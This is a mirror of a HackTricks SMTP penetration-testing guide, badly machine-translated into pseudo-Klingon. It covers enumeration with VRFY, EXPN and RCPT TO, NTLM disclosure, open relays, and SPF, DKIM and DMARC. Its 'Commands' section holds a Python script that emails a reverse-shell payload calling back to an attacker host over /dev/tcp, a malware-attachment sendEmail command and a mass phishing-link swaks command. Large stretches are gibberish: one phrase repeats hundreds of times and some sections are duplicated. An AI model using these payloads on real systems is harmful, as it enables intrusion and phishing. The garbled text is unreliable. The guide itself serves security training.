mirror of https://github.com/carlospolop/hacktricks synced 2024-11-21 20:23:18 +00:00

History

Translator workflow b442ae90c4 Translated to Klingon		2024-02-10 17:52:19 +00:00
..
README.md	Translated to Klingon	2024-02-10 17:52:19 +00:00
smtp-commands.md	Translated to Klingon	2024-02-10 17:52:19 +00:00

README.md

25,465,587 - Pentesting SMTP/s

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Instantly available setup for vulnerability assessment & penetration testing. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.

{% embed url="https://pentest-tools.com/" %}

Basic Information

The Simple Mail Transfer Protocol (SMTP) is a protocol utilized within the TCP/IP suite for the sending and receiving of e-mail. Due to its limitations in queuing messages at the recipient's end, SMTP is often employed alongside either POP3 or IMAP. These additional protocols enable users to store messages on a server mailbox and to periodically download them.

In practice, it is common for e-mail programs to employ SMTP for sending e-mails, while utilizing POP3 or IMAP for receiving them. On systems based on Unix, sendmail stands out as the SMTP server most frequently used for e-mail purposes. The commercial package known as Sendmail encompasses a POP3 server. Furthermore, Microsoft Exchange provides an SMTP server and offers the option to include POP3 support.

Default port: 25,465(ssl),587(ssl)

PORT   STATE SERVICE REASON  VERSION
25/tcp open  smtp    syn-ack Microsoft ESMTP 6.0.3790.3959

EMAIL Headers

If you have the opportunity to make the victim send you a email (via contact form of the web page for example), do it because you could learn about the internal topology of the victim seeing the headers of the mail.

You can also get an email from a SMTP server trying to send to that server an email to a non-existent address (because the server will send to the attacker a NDN mail). But, be sure that you send the email from an allowed address (check the SPF policy) and that you can receive NDN messages.

You should also try to send different contents because you can find more interesting information on the headers like: X-Virus-Scanned: by av.domain.com
You should send the EICAR test file.
Detecting the AV may allow you to exploit known vulnerabilities.

Basic actions

Banner Grabbing/Basic connection

SMTP:

nc -vn <IP> 25

SMTPS:

SMTPS (Secure SMTP) is a secure version of the Simple Mail Transfer Protocol (SMTP) that uses SSL/TLS encryption to protect the communication between the email client and the mail server. This encryption ensures that the email content and credentials are transmitted securely over the network.

To perform a penetration test on SMTPS, you can follow these steps:

Information Gathering: Gather information about the target SMTPS server, such as the IP address, domain name, and email addresses associated with it.
Port Scanning: Use a port scanning tool like Nmap to identify open ports on the target server. Look for port 465, which is commonly used for SMTPS.
Banner Grabbing: Use a tool like Telnet or Netcat to connect to the SMTPS server and retrieve the banner information. This can provide valuable information about the server software and version.
User Enumeration: Enumerate valid email addresses on the target server using techniques like SMTP VRFY and RCPT TO commands. This can help identify potential targets for further attacks.
Brute-Force Attacks: Use a tool like Hydra or Medusa to perform brute-force attacks against the SMTPS server, attempting to guess valid usernames and passwords. This can be done using a wordlist or by generating passwords based on common patterns.
Email Spoofing: Attempt to send spoofed emails from the target SMTPS server by manipulating the email headers. This can be used to impersonate legitimate users or send malicious content.
Email Relay: Test if the SMTPS server allows email relaying, which can be used to send emails to external domains without authentication. This can be exploited for spamming or phishing purposes.
Vulnerability Scanning: Use a vulnerability scanning tool like OpenVAS or Nessus to identify any known vulnerabilities in the SMTPS server software. This can help identify potential entry points for exploitation.
Exploitation: Exploit any identified vulnerabilities to gain unauthorized access to the SMTPS server or compromise email accounts. This can include techniques like command injection, buffer overflow, or SQL injection.
Post-Exploitation: Once access is gained, perform post-exploitation activities such as exfiltrating sensitive data, escalating privileges, or pivoting to other systems on the network.

Remember to always obtain proper authorization before conducting any penetration testing activities and to follow ethical hacking guidelines.

openssl s_client -crlf -connect smtp.mailgun.org:465 #SSL/TLS without starttls command
openssl s_client -starttls smtp -crlf -connect smtp.mailgun.org:587

QaparHa' 'ej ponglu'pu' 'e' yu'wIjDIvchugh vItlhutlh

To find the MX servers of an organization, you can use the following methods:

Method 1: Using `nslookup`

You can use the nslookup command to query the DNS records of the organization's domain. Open a terminal and run the following command:

nslookup -type=MX <domain>

Replace <domain> with the organization's domain name. This command will return the MX records associated with the domain, which will indicate the organization's mail servers.

Method 2: Using `dig`

Another option is to use the dig command, which provides more detailed information. Open a terminal and run the following command:

dig <domain> MX

Replace <domain> with the organization's domain name. This command will display the MX records associated with the domain.

Method 3: Online Tools

There are several online tools available that can help you find the MX servers of an organization. Some popular options include MXToolbox, DNSstuff, and MxToolbox. Simply enter the organization's domain name into the tool, and it will provide you with the MX records.

QaparHa' 'ej ponglu'pu' 'e' yu'wIjDIvchugh vItlhutlh

vItlhutlh 'e' yu'wIjDIvchugh vItlhutlh, 'ej vaj 'e' vIlo' 'e' vItlhutlh:

yuQjIjDIv 1: 'ej 'oH `nslookup`

'ej nslookup command vItlhutlh DNS records 'e' yu'wIjDIvchugh domain. terminal vItlhutlh 'ej run vItlhutlh command vaj:

nslookup -type=MX <domain>

<domain> 'e' yu'wIjDIvchugh domain name replace. vItlhutlh command vItlhutlh MX records associated 'e' yu'wIjDIvchugh domain, 'ej 'oH vItlhutlh 'e' yu'wIjDIvchugh mail servers.

yuQjIjDIv 2: 'ej 'oH `dig`

'ej 'oH 'ej 'oH 'e' vItlhutlh dig command, vItlhutlh more detailed information. terminal vItlhutlh 'ej run vItlhutlh command vaj:

dig <domain> MX

<domain> 'e' yu'wIjDIvchugh domain name replace. vItlhutlh command vItlhutlh MX records associated 'e' yu'wIjDIvchugh domain.

yuQjIjDIv 3: Online Tools

'ej 'oH online tools available vItlhutlh 'e' yu'wIjDIvchugh vItlhutlh MX servers. popular options include MXToolbox, DNSstuff, 'ej MxToolbox. 'ej 'oH 'e' yu'wIjDIvchugh domain name tool, 'ej 'oH vItlhutlh 'e' yu'wIjDIvchugh MX records.

dig +short mx google.com

QaDmey

Q

nmap -p25 --script smtp-commands 10.10.10.10
nmap -p25 --script smtp-open-relay 10.10.10.10 -v

NTLM Auth - Information disclosure

If the server supports NTLM auth (Windows) you can obtain sensitive info (versions). More info here.

NTLM Auth - Information disclosure

vaj jatlh NTLM auth (Windows) server supports, vaj vItlhutlh (versions) Sensitive info obtain. More info here.

root@kali: telnet example.com 587
220 example.com SMTP Server Banner
>> HELO
250 example.com Hello [x.x.x.x]
>> AUTH NTLM 334
NTLM supported
>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
334 TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA

nmap plugin smtp-ntlm-info.nse ghItlh automate 'ej.

QaStaHvIS tera' - ghItlh legh

SMTP tera' legh 'ej "MAIL FROM" Qap jatlh ghItlh tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej tera' legh 'ej **tera'

220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at  Wed, 15 Sep 2021 12:13:28 +0200
EHLO all
250-somedomain.com Hello [x.x.x.x]
250-TURN
250-SIZE 52428800
250-ETRN
250-PIPELINING
250-DSN
250-ENHANCEDSTATUSCODES
250-8bitmime
250-BINARYMIME
250-CHUNKING
250-VRFY
250 OK
MAIL FROM: me
250 2.1.0 me@PRODSERV01.somedomain.com....Sender OK

Sniffing

Check if you sniff some password from the packets to port 25

Auth bruteforce

Username Bruteforce Enumeration

Authentication is not always needed

RCPT TO

Sniffing

Check if you sniff some password from the packets to port 25

Auth bruteforce

Username Bruteforce Enumeration

Authentication is not always needed

RCPT TO

$ telnet 1.1.1.1 25
Trying 1.1.1.1...
Connected to 1.1.1.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO x
250 myhost Hello 18.28.38.48, pleased to meet you
MAIL FROM:example@domain.com
250 2.1.0 example@domain.com... Sender ok
RCPT TO:test
550 5.1.1 test... User unknown
RCPT TO:admin
550 5.1.1 admin... User unknown
RCPT TO:ed
250 2.1.5 ed... Recipient ok

VRFY

VRFY is a command used in the Simple Mail Transfer Protocol (SMTP) to verify the existence of a specific email address. It is commonly used by email servers to check if an email address is valid before accepting incoming messages.

The VRFY command works by sending a request to the SMTP server with the email address as the argument. The server then responds with a status code indicating whether the address is valid or not.

In a penetration testing scenario, the VRFY command can be used to gather information about the email addresses associated with a target organization. By sending VRFY requests to the SMTP server, an attacker can determine valid email addresses, which can be useful for social engineering attacks or targeted phishing campaigns.

It is important to note that not all SMTP servers support the VRFY command, as it can be a security risk. Therefore, its availability may vary depending on the target system.

To use the VRFY command, you can use the following syntax:

VRFY <email_address>

Replace <email_address> with the email address you want to verify.

Keep in mind that using the VRFY command without proper authorization is considered unethical and may be illegal. Always ensure you have proper permission and follow ethical guidelines when conducting penetration testing activities.

$ telnet 1.1.1.1 25
Trying 1.1.1.1...
Connected to 1.1.1.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello 18.28.38.48, pleased to meet you
VRFY root
250 Super-User root@myhost
VRFY blah
550 blah... User unknown

EXPN

The EXPN command is used to expand a mailing list on an SMTP server. It can be used to gather information about the users or aliases configured on the server. By sending the EXPN command followed by a mailing list name, the server will respond with the expanded list of recipients.

This command can be useful during a penetration test to gather information about the email addresses or aliases configured on the target SMTP server. It can help in identifying potential targets for further attacks, such as social engineering or phishing.

However, it's important to note that not all SMTP servers support the EXPN command, as it can be a security risk. Some servers may have it disabled or restricted to prevent information leakage. Therefore, it's necessary to check if the server allows the EXPN command before attempting to use it.

To use the EXPN command, you can use a telnet client to connect to the SMTP server on port 25. Once connected, you can issue the EXPN command followed by the mailing list name. The server will respond with the expanded list of recipients, if available.

Example:

telnet mail.example.com 25
220 mail.example.com ESMTP Postfix
EXPN mailinglist@example.com
250 2.1.5 mailinglist@example.com

In this example, the EXPN command is used to expand the "mailinglist@example.com" mailing list. The server responds with the expanded list of recipients, indicating that the mailing list exists.

It's important to use the EXPN command responsibly and only on systems that you have permission to test. Unauthorized use of this command can be considered a violation of privacy and may have legal consequences. Always ensure that you have proper authorization before performing any penetration testing activities.

$ telnet 1.1.1.1 25
Trying 1.1.1.1...
Connected to 1.1.1.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
EXPN test
550 5.1.1 test... User unknown
EXPN root
250 2.1.5 ed.williams@myhost
EXPN sshd
250 2.1.5 sshd privsep sshd@myhost

Qap automatic tools

There are several automatic tools available for SMTP pentesting that can help streamline the process and make it more efficient. These tools can assist in various tasks such as enumeration, vulnerability scanning, and exploitation. Here are some popular automatic tools used in SMTP pentesting:

Nmap: Nmap is a powerful network scanning tool that can be used to discover open SMTP ports and identify potential vulnerabilities.
Metasploit: Metasploit is a widely used framework for developing and executing exploits. It includes modules specifically designed for SMTP pentesting.
OpenVAS: OpenVAS is an open-source vulnerability scanner that can be used to identify security weaknesses in SMTP servers.
SMTP User Enumeration: This tool is specifically designed to enumerate valid users on an SMTP server. It can be used to gather information for further exploitation.
SMTP User Brute-Force: This tool is used to perform brute-force attacks on SMTP servers, attempting to guess valid usernames and passwords.
SMTP User Enum: SMTP User Enum is a tool that can be used to enumerate valid users on an SMTP server. It can be helpful in identifying potential targets for further exploitation.
SMTP User VRFY: SMTP User VRFY is a tool that can be used to verify the existence of a user on an SMTP server. It can be used to gather information for further exploitation.
SMTP User Fuzzer: This tool is used to fuzz SMTP servers by sending a large number of random requests. It can help identify potential vulnerabilities in the server's handling of user input.

These tools can be used individually or in combination to perform a comprehensive SMTP pentest. It is important to note that while these tools can automate certain tasks, manual testing and verification are still necessary to ensure accurate results.

Metasploit: auxiliary/scanner/smtp/smtp_enum
smtp-user-enum: smtp-user-enum -M <MODE> -u <USER> -t <IP>
Nmap: nmap --script smtp-enum-users <IP>

vulnerability assessment & penetration testing. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.

{% embed url="https://pentest-tools.com/" %}

DSN Reports

Delivery Status Notification Reports: If you send an email to an organisation to an invalid address, the organisation will notify that the address was invalided sending a mail back to you. Headers of the returned email will contain possible sensitive information (like IP address of the mail services that interacted with the reports or anti-virus software info).

Commands

Sending an Email from linux console

sendEmail -t to@domain.com -f from@attacker.com -s <ip smtp> -u "Important subject" -a /tmp/malware.pdf
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
- First line must be received within 60 seconds.
- End manual input with a CTRL-D on its own line.

<phishing message>

swaks --to $(cat emails | tr '\n' ',' | less) --from test@sneakymailer.htb --header "Subject: test" --body "please click here http://10.10.14.42/" --server 10.10.10.197

Sending an Email with Python

English Translation:

Sending an Email with Python

Klingon Translation:

Email yIlo' Python Daq

HTML Translation:

Sending an Email with Python

```python from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText import smtplib import sys

lhost = "127.0.0.1" lport = 443 rhost = "192.168.1.1" rport = 25 # 489,587

create message object instance

msg = MIMEMultipart()

setup the parameters of the message

password = "" msg['From'] = "attacker@local" msg['To'] = "victim@local" msg['Subject'] = "This is not a drill!"

payload

message = ("& /dev/tcp/%s/%d 0>&1'); ?>" % (lhost,lport))

print("[*] Payload is generated : %s" % message)

msg.attach(MIMEText(message, 'plain')) server = smtplib.SMTP(host=rhost,port=rport)

if server.noop()[0] != 250: print("[-]Connection Error") exit()

server.starttls()

Uncomment if log-in with authencation

server.sendmail(msg['From'], msg['To'], msg.as_string()) server.quit()

print("[***]successfully sent email to %s:" % (msg['To']))

## Mail Spoofing Countermeasures

Organizations are prevented from having unauthorized email sent on their behalf by employing **SPF**, **DKIM**, and **DMARC** due to the ease of spoofing SMTP messages.

A **complete guide to these countermeasures** is made available at [https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/).

### SPF

{% hint style="danger" %}
SPF [was "deprecated" in 2014](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/). This means that instead of creating a **TXT record** in `_spf.domain.com` you create it in `domain.com` using the **same syntax**.\
Moreover, to reuse previous spf records it's quiet common to find something like `"v=spf1 include:_spf.google.com ~all"`
{% endhint %}

**Sender Policy Framework** (SPF) is a mechanism that enables Mail Transfer Agents (MTAs) to verify whether a host sending an email is authorized by querying a list of authorized mail servers defined by the organizations. This list, which specifies IP addresses/ranges, domains, and other entities **authorized to send email on behalf of a domain name**, includes various "**Mechanisms**" in the SPF record.

#### Mechanisms

From [Wikipedia](https://en.wikipedia.org/wiki/Sender_Policy_Framework):

| Mechanism | Description                                                                                                                                                                                                                                                                                                                         |
| --------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| ALL       | Matches always; used for a default result like `-all` for all IPs not matched by prior mechanisms.                                                                                                                                                                                                                                  |
| A         | If the domain name has an address record (A or AAAA) that can be resolved to the sender's address, it will match.                                                                                                                                                                                                                   |
| IP4       | If the sender is in a given IPv4 address range, match.                                                                                                                                                                                                                                                                              |
| IP6       | If the sender is in a given IPv6 address range, match.                                                                                                                                                                                                                                                                              |
| MX        | If the domain name has an MX record resolving to the sender's address, it will match (i.e. the mail comes from one of the domain's incoming mail servers).                                                                                                                                                                          |
| PTR       | If the domain name (PTR record) for the client's address is in the given domain and that domain name resolves to the client's address (forward-confirmed reverse DNS), match. This mechanism is discouraged and should be avoided, if possible.                                                                                     |
| EXISTS    | If the given domain name resolves to any address, match (no matter the address it resolves to). This is rarely used. Along with the SPF macro language it offers more complex matches like DNSBL-queries.                                                                                                                           |
| INCLUDE   | References the policy of another domain. If that domain's policy passes, this mechanism passes. However, if the included policy fails, processing continues. To fully delegate to another domain's policy, the redirect extension must be used.                                                                                     |
| REDIRECT  | <p>A redirect is a pointer to another domain name that hosts an SPF policy, it allows for multiple domains to share the same SPF policy. It is useful when working with a large amount of domains that share the same email infrastructure.</p><p>It SPF policy of the domain indicated in the redirect Mechanism will be used.</p> |

It's also possible to identify **Qualifiers** that indicates **what should be done if a mechanism is matched**. By default, the **qualifier "+"** is used (so if any mechanism is matched, that means it's allowed).\
You usually will note **at the end of each SPF policy** something like: **\~all** or **-all**. This is used to indicate that **if the sender doesn't match any SPF policy, you should tag the email as untrusted (\~) or reject (-) the email.**

#### Qualifiers

Each mechanism within the policy may be prefixed by one of four qualifiers to define the intended result:

* **`+`**: Corresponds to a PASS result. By default, mechanisms assume this qualifier, making `+mx` equivalent to `mx`.
* **`?`**: Represents a NEUTRAL result, treated similarly to NONE (no specific policy).
* **`~`**: Denotes SOFTFAIL, serving as a middle ground between NEUTRAL and FAIL. Emails meeting this result are typically accepted but marked accordingly.
* **`-`**: Indicates FAIL, suggesting that the email should be outright rejected.

In the upcoming example, the **SPF policy of google.com** is illustrated. Note the inclusion of SPF policies from different domains within the first SPF policy:
```shell-session
dig txt google.com | grep spf
google.com.             235     IN      TXT     "v=spf1 include:_spf.google.com ~all"

dig txt _spf.google.com | grep spf
; <<>> DiG 9.11.3-1ubuntu1.7-Ubuntu <<>> txt _spf.google.com
;_spf.google.com.               IN      TXT
_spf.google.com.        235     IN      TXT     "v=spf1 include:_netblocks.google.com include:_netblocks2.google.com include:_netblocks3.google.com ~all"

dig txt _netblocks.google.com | grep spf
_netblocks.google.com.  1606    IN      TXT     "v=spf1 ip4:35.190.247.0/24 ip4:64.233.160.0/19 ip4:66.102.0.0/20 ip4:66.249.80.0/20 ip4:72.14.192.0/18 ip4:74.125.0.0/16 ip4:108.177.8.0/21 ip4:173.194.0.0/16 ip4:209.85.128.0/17 ip4:216.58.192.0/19 ip4:216.239.32.0/19 ~all"

dig txt _netblocks2.google.com | grep spf
_netblocks2.google.com. 1908    IN      TXT     "v=spf1 ip6:2001:4860:4000::/36 ip6:2404:6800:4000::/36 ip6:2607:f8b0:4000::/36 ip6:2800:3f0:4000::/36 ip6:2a00:1450:4000::/36 ip6:2c0f:fb50:4000::/36 ~all"

dig txt _netblocks3.google.com | grep spf
_netblocks3.google.com. 1903    IN      TXT     "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all"

Traditionally it was possible to spoof any domain name that didn't have a correct/any SPF record. Nowadays, if email comes from a domain without a valid SPF record is probably going to be rejected/marked as untrusted automatically.

To check the SPF of a domain you can use online tools like: https://www.kitterman.com/spf/validate.html

DKIM (DomainKeys Identified Mail)

DKIM is utilized to sign outbound emails, allowing their validation by external Mail Transfer Agents (MTAs) through the retrieval of the domain's public key from DNS. This public key is located in a domain's TXT record. To access this key, one must know both the selector and the domain name.

For instance, to request the key, the domain name and selector are essential. These can be found in the mail header DKIM-Signature, e.g., d=gmail.com;s=20120113.

A command to fetch this information might look like:

dig 20120113._domainkey.gmail.com TXT | grep p=
# This command would return something like:
20120113._domainkey.gmail.com. 280 IN   TXT    "k=rsa\; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1Kd87/UeJjenpabgbFwh+eBCsSTrqmwIYYvywlbhbqoo2DymndFkbjOVIPIldNs/m40KF+yzMn1skyoxcTUGCQs8g3

DMARC (Domain-based Message Authentication, Reporting & Conformance)

DMARC enhances email security by building on SPF and DKIM protocols. It outlines policies that guide mail servers in the handling of emails from a specific domain, including how to deal with authentication failures and where to send reports about email processing actions.

To obtain the DMARC record, you need to query the subdomain _dmarc

# Reject
dig _dmarc.facebook.com txt | grep DMARC
_dmarc.facebook.com.	3600	IN	TXT	"v=DMARC1; p=reject; rua=mailto:a@dmarc.facebookmail.com; ruf=mailto:fb-dmarc@datafeeds.phishlabs.com; pct=100"

# Quarantine
dig _dmarc.google.com txt | grep DMARC
_dmarc.google.com.	300	IN	TXT	"v=DMARC1; p=quarantine; rua=mailto:mailauth-reports@google.com"

# None
dig _dmarc.bing.com txt | grep DMARC
_dmarc.bing.com.	3600	IN	TXT	"v=DMARC1; p=none; pct=100; rua=mailto:BingEmailDMARC@microsoft.com;"

DMARC tags

Tag Name	Purpose	Sample
v	Protocol version	v=DMARC1
pct	Percentage of messages subjected to filtering	pct=20
ruf	Reporting URI for forensic reports	ruf=mailto:authfail@example.com
rua	Reporting URI of aggregate reports	rua=mailto:aggrep@example.com
p	Policy for organizational domain	p=quarantine
sp	Policy for subdomains of the OD	sp=reject
adkim	Alignment mode for DKIM	adkim=s
aspf	Alignment mode for SPF	aspf=r

What about Subdomains?

From here.
You need to have separate SPF records for each subdomain you wish to send mail from.
The following was originally posted on openspf.org, which used to be a great resource for this kind of thing.

The Demon Question: What about subdomains?

If I get mail from pielovers.demon.co.uk, and there's no SPF data for pielovers, should I go back one level and test SPF for demon.co.uk? No. Each subdomain at Demon is a different customer, and each customer might have their own policy. It wouldn't make sense for Demon's policy to apply to all its customers by default; if Demon wants to do that, it can set up SPF records for each subdomain.

So the advice to SPF publishers is this: you should add an SPF record for each subdomain or hostname that has an A or MX record.

Sites with wildcard A or MX records should also have a wildcard SPF record, of the form: * IN TXT "v=spf1 -all"

This makes sense - a subdomain may very well be in a different geographical location and have a very different SPF definition.

Open Relay

When emails are sent, ensuring they don't get flagged as spam is crucial. This is often achieved through the use of a relay server that is trusted by the recipient. However, a common challenge is that administrators might not be fully aware of which IP ranges are safe to allow. This lack of understanding can lead to mistakes in setting up the SMTP server, a risk frequently identified in security assessments.

A workaround that some administrators use to avoid email delivery issues, especially concerning communications with potential or ongoing clients, is to allow connections from any IP address. This is done by configuring the SMTP server's mynetworks parameter to accept all IP addresses, as shown below:

mynetworks = 0.0.0.0/0

pentesting-smtp

tlhIngan Hol

ghItlhvam 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. 